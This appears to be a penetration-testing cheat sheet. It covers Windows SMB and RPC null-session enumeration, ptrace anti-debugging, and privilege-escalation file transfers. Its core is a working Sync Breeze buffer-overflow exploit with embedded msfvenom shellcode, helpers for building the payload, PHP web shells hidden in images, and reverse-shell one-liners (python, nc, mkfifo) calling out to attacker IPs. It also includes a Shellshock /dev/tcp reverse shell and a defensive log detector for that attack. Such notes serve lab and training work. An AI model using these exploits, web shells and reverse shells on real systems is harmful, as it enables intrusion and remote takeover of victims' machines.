Windows enumeration

Port 5985 - WinRM (Windows Remote Management over HTTP; useful for a remote shell once you have valid credentials)

SMB:

   smbclient -N -U "" -L //<ip>        ->  -L lists the shares on the host; -U "" with -N tries a null session (no user, no password prompt)
   smbclient -N -U "" //<ip>/<share>   ->  connects to a share as the anonymous user
 
   smb: \> recurse on                  ->  make ls (and mget) descend into subdirectories
   smb: \> ls
   
   smb: \> mget <file>                 ->  downloads a file (after "prompt off", mget * grabs everything without confirmation)
   
   smbget -R smb://<ip>/path/ -U ""    ->  -R downloads the path recursively; -U "" again means anonymous

rpcclient:

  rpcclient -U "" -N 10.10.10.161      ->  null session over MS-RPC; fails if the host denies anonymous access
  commands:
           enumdomusers                ->  domain users with their RIDs (lines like user:[name] rid:[0x1f4])
           enumdomgroups               ->  domain groups with their RIDs
           queryuser 0x<rid>           ->  details for one user (description, last logon, password last set)
           querygroup 0x<rid>
           querygroupmem 0x<rid>       ->  members of a group, returned as RIDs
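The RIDs that enumdomusers and enumdomgroups print are what you feed back into queryuser, querygroup and querygroupmem. The following is an added example, not code from the original post: a small parser for that output format plus a helper that builds the follow-up command list. The sample output, the account names and the RIDs in it are constructed for the example; the rule that RIDs below 1000 are well-known built-ins (500 Administrator, 501 Guest, 502 krbtgt, 512 Domain Admins) is standard Windows behaviour.

```python
import re

# Constructed sample output in the line format rpcclient's enumdomusers / enumdomgroups print.
ENUMDOMUSERS_OUT = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[svc-backup] rid:[0x451]
user:[j.doe] rid:[0x452]
"""
ENUMDOMGROUPS_OUT = """\
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[IT-Admins] rid:[0x45a]
"""

ENTRY_RE = re.compile(r"^(?:user|group):\[(?P<name>[^\]]*)\] rid:\[(?P<rid>0x[0-9a-fA-F]+)\]\s*$")


def parse_rids(output):
    """(name, rid) pairs from enumdomusers / enumdomgroups output; lines that do not match are skipped."""
    pairs = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            pairs.append((m.group("name"), int(m.group("rid"), 16)))
    return pairs


def is_builtin(rid):
    """Well-known RIDs are below 1000; accounts and groups created by admins get RIDs from 1000 upwards,
    so those are usually the interesting targets."""
    return rid < 1000


def followup_commands(users_out, groups_out):
    """The queryuser / querygroup / querygroupmem lines to run next, one per RID."""
    cmds = [f"queryuser 0x{rid:x}" for _, rid in parse_rids(users_out)]
    for _, rid in parse_rids(groups_out):
        cmds.append(f"querygroup 0x{rid:x}")
        cmds.append(f"querygroupmem 0x{rid:x}")
    return cmds


if __name__ == "__main__":
    for name, rid in parse_rids(ENUMDOMUSERS_OUT):
        tag = "builtin" if is_builtin(rid) else "custom"
        print(f"{name:<16} rid={rid} (0x{rid:x}) {tag}")
    # rpcclient accepts the commands as one -c string, separated by semicolons
    print('rpcclient -U "" -N <ip> -c "' + "; ".join(followup_commands(ENUMDOMUSERS_OUT, ENUMDOMGROUPS_OUT)) + '"')
```

Pipe the real enumdomusers output into parse_rids (for example from `rpcclient -U "" -N <ip> -c enumdomusers`) and the printed -c line runs all the follow-up queries in one go.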

\xre\xve\xrs\xe0

How to stop someone attaching a debugger to your program: call ptrace(PTRACE_TRACEME) early. A process can have only one tracer, so if a debugger is already attached (or the binary was started under gdb or strace) the call fails and the program bails out. It is a speed bump, not protection: a reverser can patch the check out, LD_PRELOAD a libc shim whose ptrace() returns 0, or break on the syscall in gdb and flip the return value.

#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>

/* PTRACE_TRACEME returns -1 when another process already traces us */
if (ptrace(PTRACE_TRACEME, 0, 1, 0) < 0)
{
    printf("[-] Don't use a debugger!\n");
    abort();
}

Buffer overflow

Simple buffer overflow on a web server

This post is about writing a buffer overflow exploit to get a remote shell. We will exploit Sync Breeze Enterprise 10.0.28 on a Windows box. PS: This post is not updated. If I get time I will write the code's explanation. Thank you <3

```python
import socket

# msfvenom-generated shellcode (the original script called this variable "badchars";
# it is the payload, not a bad-character test string)
shellcode = (
    b"\xba\xa7\x57\x4f\xe1\xda\xda\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
    b"\x52\x31\x56\x12\x83\xc6\x04\x03\xf1\x59\xad\x14\x01\x8d\xb3"
    b"\xd7\xf9\x4e\xd4\x5e\x1c\x7f\xd4\x05\x55\xd0\xe4\x4e\x3b\xdd"
    b"\x8f\x03\xaf\x56\xfd\x8b\xc0\xdf\x48\xea\xef\xe0\xe1\xce\x6e"
    b"\x63\xf8\x02\x50\x5a\x33\x57\x91\x9b\x2e\x9a\xc3\x74\x24\x09"
    b"\xf3\xf1\x70\x92\x78\x49\x94\x92\x9d\x1a\x97\xb3\x30\x10\xce"
    b"\x13\xb3\xf5\x7a\x1a\xab\x1a\x46\xd4\x40\xe8\x3c\xe7\x80\x20"
    b"\xbc\x44\xed\x8c\x4f\x94\x2a\x2a\xb0\xe3\x42\x48\x4d\xf4\x91"
    b"\x32\x89\x71\x01\x94\x5a\x21\xed\x24\x8e\xb4\x66\x2a\x7b\xb2"
    b"\x20\x2f\x7a\x17\x5b\x4b\xf7\x96\x8b\xdd\x43\xbd\x0f\x85\x10"
    b"\xdc\x16\x63\xf6\xe1\x48\xcc\xa7\x47\x03\xe1\xbc\xf5\x4e\x6e"
    b"\x70\x34\x70\x6e\x1e\x4f\x03\x5c\x81\xfb\x8b\xec\x4a\x22\x4c"
    b"\x12\x61\x92\xc2\xed\x8a\xe3\xcb\x29\xde\xb3\x63\x9b\x5f\x58"
    b"\x73\x24\x8a\xcf\x23\x8a\x65\xb0\x93\x6a\xd6\x58\xf9\x64\x09"
    b"\x78\x02\xaf\x22\x13\xf9\x38\x8d\x4c\x1c\x84\x65\x8f\x1e\xe7"
    b"\x2e\x06\xf8\x6d\xc1\x4e\x53\x1a\x78\xcb\x2f\xbb\x85\xc1\x4a"
    b"\xfb\x0e\xe6\xab\xb2\xe6\x83\xbf\x23\x07\xde\x9d\xe2\x18\xf4"
    b"\x89\x69\x8a\x93\x49\xe7\xb7\x0b\x1e\xa0\x06\x42\xca\x5c\x30"
    b"\xfc\xe8\x9c\xa4\xc7\xa8\x7a\x15\xc9\x31\x0e\x21\xed\x21\xd6"
    b"\xaa\xa9\x15\x86\xfc\x67\xc3\x60\x57\xc6\xbd\x3a\x04\x80\x29"
    b"\xba\x66\x13\x2f\xc3\xa2\xe5\xcf\x72\x1b\xb0\xf0\xbb\xcb\x34"
    b"\x89\xa1\x6b\xba\x40\x62\x9b\xf1\xc8\xc3\x34\x5c\x99\x51\x59"
    b"\x5f\x74\x95\x64\xdc\x7c\x66\x93\xfc\xf5\x63\xdf\xba\xe6\x19"
    b"\x70\x2f\x08\x8d\x71\x7a"
)

nops = b"\x90" * 10
eip = b"\x71\xE8\xF1\x77"      # 0x77F1E871 in little-endian order; overwrites the saved return address
# eip2 = b"\x83\x0c\x09\x10"   # 0x10090c83, the alternative address noted in the original, unused
buf = b"A" * 780 + eip + b"CCCC" + nops + shellcode
# crash value in EIP: 42306142 -> offset 780
# 10090c83

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.29.130", 80))

payload = b"username=" + buf + b"&password=A"
req = b"POST /login HTTP/1.1\r\n"
req += b"Host: 192.168.29.129\r\n"
req += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
req += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
req += b"Accept-Language: en-US,en;q=0.5\r\n"
req += b"Referer: http://192.168.29.129/login\r\n"
req += b"Connection: close\r\n"
req += b"Content-Type: application/x-www-form-urlencoded\r\n"
req += b"Content-Length: " + str(len(payload)).encode() + b"\r\n"
req += b"\r\n"
req += payload
s.send(req)
print(len(buf))
print(req)
s.close()
```
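The numbers in the exploit's comments (crash value 0x42306142, offset 780) come from sending a cyclic pattern and reading EIP in the debugger. The following is an added example, not code from the original post: a Python reimplementation of the pattern_create / pattern_offset procedure, a bad-character array generator, and a builder for the same payload layout the exploit uses (filler, return address, four pad bytes, NOP sled, shellcode). The return address 0x77F1E871 and the offset are the page's own values; the int3 bytes used as shellcode in the usage call are a stand-in, and the assumption that 0x00 is always a bad character is the usual one for a string-copy overflow.

```python
import string
import struct

MAX_PATTERN = 26 * 26 * 10 * 3   # 20280 bytes before the Aa0 sequence would repeat


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...Aa9Ab0...): every 4-byte window is unique."""
    if length > MAX_PATTERN:
        raise ValueError("pattern longer than %d bytes repeats" % MAX_PATTERN)
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(value, length=MAX_PATTERN):
    """Offset of the bytes that landed in a register. Pass the register as an int (EIP=0x42306142 as
    shown by the debugger) and it is packed little-endian, or pass the 4 raw bytes. Returns -1 if absent."""
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    return pattern_create(length).find(needle)


def badchar_array(exclude=b"\x00"):
    """0x01..0xff minus the bytes already known bad (assumption: 0x00 is bad for a string-copy overflow).
    Send it in place of the shellcode and compare against memory after the crash to find the next bad byte."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def p32(addr):
    """Pack a 32-bit address little-endian, the order x86 expects it on the stack."""
    return struct.pack("<I", addr)


def build_payload(offset, ret_addr, shellcode, pad=b"CCCC", nops=b"\x90" * 10, filler=b"A"):
    """The layout the exploit above uses: filler up to EIP, return address, 4 pad bytes, NOP sled, shellcode."""
    return filler * offset + p32(ret_addr) + pad + nops + shellcode


if __name__ == "__main__":
    print(pattern_offset(0x42306142))                     # 780, the offset used on this page
    print(p32(0x77F1E871))                                # same bytes as "\x71\xE8\xF1\x77"
    stage = build_payload(780, 0x77F1E871, b"\xcc" * 8)   # int3 bytes as stand-in shellcode
    print(len(stage))
```

The bad-character step matters more than it looks: shikata_ga_nai output like the shellcode above contains arbitrary bytes, so msfvenom must be told every byte the target mangles (-b '\x00...') or the decoder stub is corrupted before it runs.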


Windows Privilege Escalation

This post's content is about what to do once you have a low-privileged shell on a Windows machine. The first thing you usually need is a way to get files (enumeration scripts, binaries) onto the box.

Steps:

Start a web server on the attacker machine:
>python3 -m http.server 80 #on attacker machine
On the victim machine:
1)Using certutil.exe (saves the file to the current directory; a well-known LOLBin, so expect Defender to notice)
>certutil.exe -urlcache -split -f http://<ip>:<port>/path/to/file
2)Using powershell
>powershell -c (New-Object Net.WebClient).DownloadFile('http://<ip>:<port>/file', 'output-file')

Upload Photos RCE

Using exiftool (writes the PHP into the JPEG's COM segment, so the magic bytes and the image itself stay intact; note the double quotes around cmd, single quotes would end the shell's quoting early)

  exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' normal.jpg
  mv normal.jpg normal.php.jpg     ->  double extension: works when the server hands anything containing .php to the PHP handler but the upload filter only checks the last extension

Vim edit png (open the image in vim and paste the shell into it; leave the file's first bytes alone so it still passes a magic-byte check)

  <?php echo "START<br/><br/>\n\n\n"; system($_GET["cmd"]); echo "\n\n\n<br/><br/>END"; ?>

reverse shells (catch them with a listener on the attacker side, e.g. nc -lvnp 4444)

  python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.30",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
  rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.4 4444 >/tmp/f     ->  works with any nc; the fifo carries the listener's input back into the shell
  nc -e /bin/sh 10.0.0.1 1234     ->  only with nc builds that have -e (traditional netcat, ncat); openbsd-netcat lacks it, use the fifo version instead

Linux Stuff

Shellshock Reverse Shell (CVE-2014-6271; hits bash-backed CGI scripts, which copy request headers into environment variables; the echo; emits the blank line that ends the CGI response headers) -> User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1
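The same pattern is easy to spot from the defender's side. The following is an added example, not code from the original post: a check that scans Apache combined-format access log lines for the "() { ... };" function-definition prefix followed by a trailing command, and reports the source, the CGI path and the injected command. The log lines are constructed for the example; a log-based check only sees headers that get logged (User-Agent, Referer), so a WAF or IDS rule should inspect every header and the query string too.

```python
import re

# Constructed Apache combined-log lines; the last quoted field is the User-Agent header.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; echo; /bin/bash -i >& /dev/tcp/10.0.0.9/4444 0>&1"
10.0.0.6 - - [01/Jan/2020:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.0.0.7 - - [01/Jan/2020:10:00:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 12 "-" "() { ignored; }; /bin/cat /etc/passwd"
10.0.0.8 - - [01/Jan/2020:10:00:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "curl/7.64.0"
"""

# Vulnerable bash treats any environment variable whose value starts with "() {" as a function
# definition and keeps executing whatever follows the closing brace. That trailing part is the payload.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>[^\"]+)")


def find_shellshock(log_text):
    """Return (source_ip, request_path, injected_command) for every line carrying the pattern."""
    hits = []
    for line in log_text.splitlines():
        m = SHELLSHOCK_RE.search(line)
        if not m:
            continue
        fields = line.split()
        src = fields[0]
        path = fields[6].strip('"') if len(fields) > 6 else ""
        hits.append((src, path, m.group("cmd").strip()))
    return hits


if __name__ == "__main__":
    for src, path, cmd in find_shellshock(SAMPLE_LOG):
        print(f"{src} -> {path}: {cmd}")
```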
